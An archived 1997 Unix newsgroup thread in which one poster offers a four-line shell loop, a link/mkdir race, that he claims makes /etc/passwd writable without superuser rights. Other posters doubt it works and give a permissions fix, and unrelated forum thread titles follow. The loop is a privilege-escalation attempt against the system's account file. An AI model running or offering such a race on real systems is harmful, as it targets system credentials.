by Tro » Wed, 03 Sep 1997 04:00:00
I know a small shell program that change /etc/passwd mode, ownership
and group ! WITHOUT being Super-User !
while true
do
link my_dir /etc/passwd &
nice -20 mkdir my_dir
ls -l /etc/passwd &
done
(Strange ? Yes !)
Where : my_dir is a directory with -rw-rw-rw- .
Results are statistical. On some systems may not function.
by Nick Maclar » Thu, 04 Sep 1997 04:00:00
|> |>
|> |>I know a small shell program that change /etc/passwd mode, ownership
|> |>and group ! WITHOUT being Super-User !
|> |>
|> |>while true
|> |>do
|> |> link my_dir /etc/passwd &
|> |> nice -20 mkdir my_dir
|> |> ls -l /etc/passwd &
|> |>done
|> |>
|> |>(Strange ? Yes !)
|> |>
|> |>Where : my_dir is a directory with -rw-rw-rw- .
|> |>
|> |>Results are statistical. On some systems may not function.
|> |
|> |Yes, this is well known. The solution is for the superuser to type the
|> |command 'chmod og-w /etc'.
|>
|> This is well known!? How can it possibly work? The 'link' should fail
|> because normal users aren't allowed to link directories (or because
|> my_dir doesn't exist, the first time around). If mkdir has a race
|> condition in the kernel, it sure looks like a strange one... and if
|> /etc is world or group writable like your fix suggests, you have bigger
|> problems than weird races...
And, if you have a directory with '-rw-rw-rw-', you have worse problems
than a world-writable /etc :-)
More seriously, in English rather than Unix-speak, /etc/password can
also be called a directory. I had assumed a certain amount of
terminological confusion.
Nick Maclaren,
University of Cambridge Computer Laboratory,
New Museums Site, Pembroke Street, Cambridge CB2 3QG, England.
Tel.: +44 1223 334761 Fax: +44 1223 334679
by robe » Thu, 04 Sep 1997 04:00:00
>Are there *really* any Unices which have /etc group/world writable?
>What an astonishing thing to do. Even SGI don't do that, and they do
>more brainless things than most.
Hmm, I seem to recall 'visiting' a machine which had that, though I don't
remember what OS it ran (it's also been like 2 years ago). I _also_ recall
an SGI machine with /etc/aliases world-writable :)
robert
1. I want FTP default to be -rwxrwxrwx files, NOT system default like -rw-rw-rw- files !
Hi,
I am a "rookie" HP-UNIX Sys Adminstrator.
I want FTP to be default at -rwxrwxrwx for all files. I don't want the
system default like -rw-rw-rw- or whatever.
I tried "umask" in the profile file (setting umask to 0) and I got the
system default mode like -rw-rw-rw-. I tried the ftpd command in the
"inetd.conf" configuration file and I still got the system default. How can
I "bypass" this system default ? What does the system default come from ?
I really hope it's possible.
Let you know that I am not interested in "anonymous" FTP.
Any recommedation or suggestion ?
Thank you,
John
2. load average
3. File permission set to -rw-rw-rw-?by Apache/CGI?
5. flexlm on HPs requires rw-rw-rw- on /dev/lan0
6. Installation via ISP and ftp
7. Summary: ftpd from SunOS 4.1.3 creates files with rw-rw-rw
9. I want FTP default to be -rwxrwxrwx files, NOT system default like -rw-rw-rw- files !
10. vi (Re: =-> Is /tmp: -rw-rw-rw- root system" a risc?)
11. ftpd from SunOS 4.1.3 creates files with rw-rw-rw
12. broken 2.2 IDE CD-RW (was Re: plain 2.2.X: no ide CD-RW?)
13. Mount NFS(rw) but actually can't rw.